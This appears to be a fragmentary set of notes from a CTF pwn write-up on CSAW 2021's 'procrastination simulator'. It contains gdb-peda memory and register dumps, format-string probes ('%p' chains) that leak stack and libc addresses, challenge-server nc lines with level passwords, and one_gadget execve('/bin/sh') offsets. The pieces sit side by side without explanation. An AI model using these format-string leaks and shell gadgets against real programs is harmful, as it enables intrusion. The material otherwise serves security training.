gdb-peda$ vmmap
Start      End        Perm	Name
0x08048000 0x08049000 r--p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chal
0x08049000 0x0804b000 r-xp	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chal
0x0804b000 0x0804d000 r--p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chal
0x0804d000 0x0804e000 r--p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chal
0x0804e000 0x0804f000 rw-p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chal
0x0804f000 0x08071000 rw-p	[heap]
0xf7dd3000 0xf7fa8000 r-xp	/lib/i386-linux-gnu/libc-2.27.so
0xf7fa8000 0xf7fa9000 ---p	/lib/i386-linux-gnu/libc-2.27.so
0xf7fa9000 0xf7fab000 r--p	/lib/i386-linux-gnu/libc-2.27.so
0xf7fab000 0xf7fac000 rw-p	/lib/i386-linux-gnu/libc-2.27.so
0xf7fac000 0xf7faf000 rw-p	mapped
0xf7fcf000 0xf7fd1000 rw-p	mapped
0xf7fd1000 0xf7fd4000 r--p	[vvar]
0xf7fd4000 0xf7fd6000 r-xp	[vdso]
0xf7fd6000 0xf7ffc000 r-xp	/lib/i386-linux-gnu/ld-2.27.so
0xf7ffc000 0xf7ffd000 r--p	/lib/i386-linux-gnu/ld-2.27.so
0xf7ffd000 0xf7ffe000 rw-p	/lib/i386-linux-gnu/ld-2.27.so
0xfffdd000 0xffffe000 rw-p	[stack]

gdb-peda$ x/80wx 0x0804e000
0x804e000:	0x0804df0c	0xf7ffd940	0xf7feadd0	0xf7e24430
0x804e010:	0xf7e38e10	0xf7e39110	0x08049070	0x08049080
0x804e020:	0xf7e3aca0	0x080490a0	0x080490b0	0xf7debe30
0x804e030:	0x080490d0	0x080490e0	0x080490f0	0x00000000
0x804e040:	0x00000000	0x0804b008	0x00000000	0x00000000
0x804e050:	0x00000000	0x00000000	0x00000000	0x00000000


Proceeding to the challenge...

*** Procrastination Simulator Level One ***

   Help! I need to write 60 reports by Sunday afternoon. Give me some content and I will generate a report!!
> AAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p
Thanks! I'll work with the following:

AAAA,0x96,0xf7fab5c0,0x804a0fb,0xf7e472e7,0x4141f980,0x252c4141,0x70252c70,0x2c70252c,0x252c7025
Time to go write this!
[Inferior 1 (process 118780) exited normally]

    'Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11016 and use password a60d54c8e22e29052bf16dd854d189ab\n'
14 password = a60d54c8e22e29052bf16dd854d189ab

Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11029 and use password f0367c0f403f97e5c7af3b80d65a3880\n'
27 password = f0367c0f403f97e5c7af3b80d65a3880

                                                                                             Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11030 and use password 3ca7cdd88e1b97345725287040a47c35\n'
28 password = 3ca7cdd88e1b97345725287040a47c35

Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11031 and use password 676b8b041ae5640ba189fe0fa12a0fe3\n'

your flag is in another box! nc auto-pwn.chal.csaw.io 11045 and use password 25f241b9b6c236cc30c2c2a59ff0c094\n'
43 password = 25f241b9b6c236cc30c2c2a59ff0c094

Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11046 and use password e02d9819275a736cdfb5bff2e30f3f50\n'
44 password = e02d9819275a736cdfb5bff2e30f3f50

Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11047 and use password 0c80a2a1622b398fc57c0e892236e1b5

 Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11049 and use password 2d18ecd9b030d6e75f40a1005c699679\n'
47 password = 2d18ecd9b030d6e75f40a1005c699679

    'Sorry, but your flag is in another box! nc auto-pwn.chal.csaw.io 11050 and use password c2e3b5a18558c52e952c8da894a97d40\n'
48 password = c2e3b5a18558c52e952c8da894a97d40


-rwxr-xr-x 1 root root 1689360 Feb  6  2019 libc-2.24.so
lrwxrwxrwx 1 root root      12 Feb  6  2019 libc.so.6 -> libc-2.24.so
lrwxrwxrwx 1 root root      18 Jul  3  2016 libcap-ng.so.0 -> libcap-ng.so.0.0.0
-rw-r--r-- 1 root root   22944 Jul  3  2016 libcap-ng.so.0.0.0
lrwxrwxrwx 1 root root      14 May 18  2016 libcap.so.2 -> libcap.so.2.25
-rw-r--r-- 1 root root   22768 May 18  2016 libcap.so.2.25
-rw-r--r-- 1 root root  190888 Feb  6  2019 libcidn-2.24.so
lrwxrwxrwx 1 root root      15 Feb  6  2019 libcidn.so.1 -> libcidn-2.24.so
lrwxrwxrwx 1 root root      17 Jul 25  2020 libcom_err.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root   14248 Jul 25  2020 libcom_err.so.2.1
-rw-r--r-- 1 root root   39256 Feb  6  2019 libcrypt-2.24.so
lrwxrwxrwx 1 root root      16 Feb  6  2019 libcrypt.so.1 -> libcrypt-2.24.so

gdb-peda$ vmmap
Start              End                Perm	Name
0x0000555555554000 0x0000555555555000 r--p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chall45
0x0000555555555000 0x0000555555556000 r-xp	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chall45
0x0000555555556000 0x0000555555557000 r--p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chall45
0x0000555555557000 0x0000555555558000 rw-p	/home/mito/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator/chall45
0x0000555555558000 0x0000555555579000 rw-p	[heap]
0x00007ffff79e2000 0x00007ffff7bc9000 r-xp	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7bc9000 0x00007ffff7dc9000 ---p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dc9000 0x00007ffff7dcd000 r--p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcd000 0x00007ffff7dcf000 rw-p	/lib/x86_64-linux-gnu/libc-2.27.so
0x00007ffff7dcf000 0x00007ffff7dd3000 rw-p	mapped
0x00007ffff7dd3000 0x00007ffff7dfc000 r-xp	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7fd5000 0x00007ffff7fd7000 rw-p	mapped
0x00007ffff7ff7000 0x00007ffff7ffa000 r--p	[vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 r-xp	[vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 r--p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffd000 0x00007ffff7ffe000 rw-p	/lib/x86_64-linux-gnu/ld-2.27.so
0x00007ffff7ffe000 0x00007ffff7fff000 rw-p	mapped
0x00007ffffffde000 0x00007ffffffff000 rw-p	[stack]
0xffffffffff600000 0xffffffffff601000 r-xp	[vsyscall]

gdb-peda$ x/80gx 0x7fffffffdc20
0x7fffffffdc20:	0x0000000008a25995	0x000055555555774c
0x7fffffffdc30:	0x6161616161616161	0x0a61616161616161
0x7fffffffdc40:	0x0000555555558200	0x00007ffff7a6d28d
0x7fffffffdc50:	0x0000000000000000	0x00007ffff7dce760
0x7fffffffdc60:	0x0000000000000d68	0x0000000000000001
0x7fffffffdc70:	0x0000555555558260	0x00007ffff7a6f021
0x7fffffffdc80:	0x0000000000000000	0x00007ffff7dce760
0x7fffffffdc90:	0x000000000000000a	0x0000555555556250
0x7fffffffdca0:	0x00007ffff7dca2a0	0x0000000000000000
0x7fffffffdcb0:	0x0000000000000000	0x00007ffff7a6f4d3
0x7fffffffdcc0:	0x0000000000000020	0x00007ffff7dce760
0x7fffffffdcd0:	0x0000555555556250	0x00007ffff7dce760
0x7fffffffdce0:	0x00007ffff7dca2a0	0x00007ffff7a6095d
0x7fffffffdcf0:	0x00007fffffffdd50	0x3ac909541b8adc00
0x7fffffffdd00:	0x00007fffffffdd50	0x00005555555555a2
0x7fffffffdd10:	0x00007fffffffde38	0x000000015555561d
0x7fffffffdd20:	0x3931383964323065	0x6336333761353732
0x7fffffffdd30:	0x3266666235626664	0x3035663366303365
0x7fffffffdd40:	0x00007fffffff000a	0x3ac909541b8adc00
0x7fffffffdd50:	0x00005555555555d0	0x00007ffff7a03bf7
0x7fffffffdd60:	0x0000000000000001	0x00007fffffffde38



   Help! I need to write 60 reports by Sunday afternoon and I'm doing three reports at once. Give me some content and I will generate Report 1 in this batch!!
> %p
Thanks! Here are the contents of Report 1:
0x555555558260
Time to go write this!
   Help! I need to write 60 reports by Sunday afternoon and I'm doing three reports at once. Give me some content and I will generate Report 2 in this batch!!
> AAAAAAAA,%p,%p,%p,%p,%p,%p,%p,%p,%p
Thanks! Here are the contents of Report 2:
AAAAAAAA,0x555555558260,(nil),(nil),(nil),(nil),0x8a25995,0x55555555774c,0x4141414141414141,0x252c70252c70252c
Time to go write this!
   Help! I need to write 60 reports by Sunday afternoon and I'm doing three reports at once. Give me some content and I will generate Report 3 in this batch!!

0x555555557660:	0x0000000000000000	0x0000000000000000
0x555555557670:	0x0000000000000000	0x0000000000003488
0x555555557680:	0x0000000000000000	0x0000000000000000
0x555555557690:	0x00007ffff7a648f0	0x00007ffff7a62aa0
0x5555555576a0:	0x00007ffff7a60330	0x00007ffff7b16b10
0x5555555576b0:	0x00007ffff7a46f70	0x00007ffff7b70e90
0x5555555576c0:	0x00007ffff7a69e60	0x00007ffff7a60c00
0x5555555576d0:	0x00007ffff7a608c0	0x00007ffff7a60f10
0x5555555576e0:	0x00007ffff7a25240	0x0000000000000000
0x5555555576f0:	0x00007ffff7a03b10	0x0000000000000000
0x555555557700:	0x0000000000000000	0x00007ffff7a25640
0x555555557710:	0x0000000000000000	0x0000555555557718
0x555555557720:	0x0000555555556008	0x0000000000000000
0x555555557730 <stdout>:	0x00007ffff7dce760	0x0000000000000000
0x555555557740 <stdin>:	0x00007ffff7dcda00	0x0000000100000000
0x555555557750:	0x0000000000000000	0x0000000000000000


[----------------------------------registers-----------------------------------]
RAX: 0xa ('\n')
RBX: 0x0 
RCX: 0x0 
RDX: 0x0 
RSI: 0x555555558260 ("aaaaaaaaa\nre are the contents of Report 3:\nay afternoon and I'm doing three reports at once. Give me some content and I will generate Report 3 in this batch!!\n")
RDI: 0x1 
RBP: 0x7fffffffddc0 --> 0x7fffffffde10 --> 0x5555555555d0 (endbr64)
RSP: 0x7fffffffdcd8 --> 0x55555555546a (lea    rdi,[rip+0xcec]        # 0x55555555615d)
RIP: 0x7ffff7a4702d (<__printf+189>:	ret)
R8 : 0x0 
R9 : 0x0 
R10: 0x0 
R11: 0x246 
R12: 0x5555555551a0 (endbr64)
R13: 0x7fffffffdef0 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7ffff7a4701b <__printf+171>:	xor    rcx,QWORD PTR fs:0x28
   0x7ffff7a47024 <__printf+180>:	jne    0x7ffff7a4702e <__printf+190>
   0x7ffff7a47026 <__printf+182>:	add    rsp,0xd8
=> 0x7ffff7a4702d <__printf+189>:	ret    
   0x7ffff7a4702e <__printf+190>:	call   0x7ffff7b16b10 <__stack_chk_fail>
   0x7ffff7a47033:	nop    WORD PTR cs:[rax+rax*1+0x0]
   0x7ffff7a4703d:	nop    DWORD PTR [rax]
   0x7ffff7a47040 <__GI___snprintf>:	sub    rsp,0xd8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffdcd8 --> 0x55555555546a (lea    rdi,[rip+0xcec]        # 0x55555555615d)
0008| 0x7fffffffdce0 --> 0x8a25995 
0016| 0x7fffffffdce8 --> 0x55555555774c --> 0x2 
0024| 0x7fffffffdcf0 ("aaaaaaaaa\n")
0032| 0x7fffffffdcf8 --> 0xa61 ('a\n')
0040| 0x7fffffffdd00 --> 0x0 
0048| 0x7fffffffdd08 --> 0x0 
0056| 0x7fffffffdd10 --> 0x0 
[------------------------------------------------------------------------------]

gdb-peda$ x/80gx 0x7fffffffdc00
0x7fffffffdc00:	0x0000003000000008	0x00007fffffffdce0
0x7fffffffdc10:	0x00007fffffffdc20	0x62a30ab178bc8800
0x7fffffffdc20:	0x00007ffff7dcda00	0x0000555555558260
0x7fffffffdc30:	0x0000000000000000	0x0000000000000000
0x7fffffffdc40:	0x0000000000000000	0x0000000000000000
0x7fffffffdc50:	0x0000000000000000	0x0000000000000000
0x7fffffffdc60:	0x00007fffffffdcf0	0x00007ffff7a61fb2
0x7fffffffdc70:	0x000055555555867a	0x0000000100000000
0x7fffffffdc80:	0x0000000000000000	0x00007ffff7dcda00
0x7fffffffdc90:	0x00007fffffffdcf0	0x0000000000000000
0x7fffffffdca0:	0x00007fffffffdef0	0x0000000000000000
0x7fffffffdcb0:	0x0000000000000000	0x00007ffff7a60cad
0x7fffffffdcc0:	0x0000000000000000	0x00007fffffffddc0
0x7fffffffdcd0:	0x00005555555551a0	0x000055555555546a
                                          ↑　リターンアドレス
0x7fffffffdce0:	0x0000000008a25995	0x000055555555774c
0x7fffffffdcf0:	0x6161616161616161	0x0000000000000a61
0x7fffffffdd00:	0x0000000000000000	0x0000000000000000
0x7fffffffdd10:	0x0000000000000000	0x0000000000000000
0x7fffffffdd20:	0x0000000000000000	0x0000000000000000

0x00000000000


mito@ubuntu:~/CTF/CSAW_CTF_Qualification_Round_2021/Pwn_procrastination-simulator$ one_gadget libc6_2.31-0ubuntu9_amd64.so
0xe6aee execve("/bin/sh", r15, r12)
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe6af1 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe6af4 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
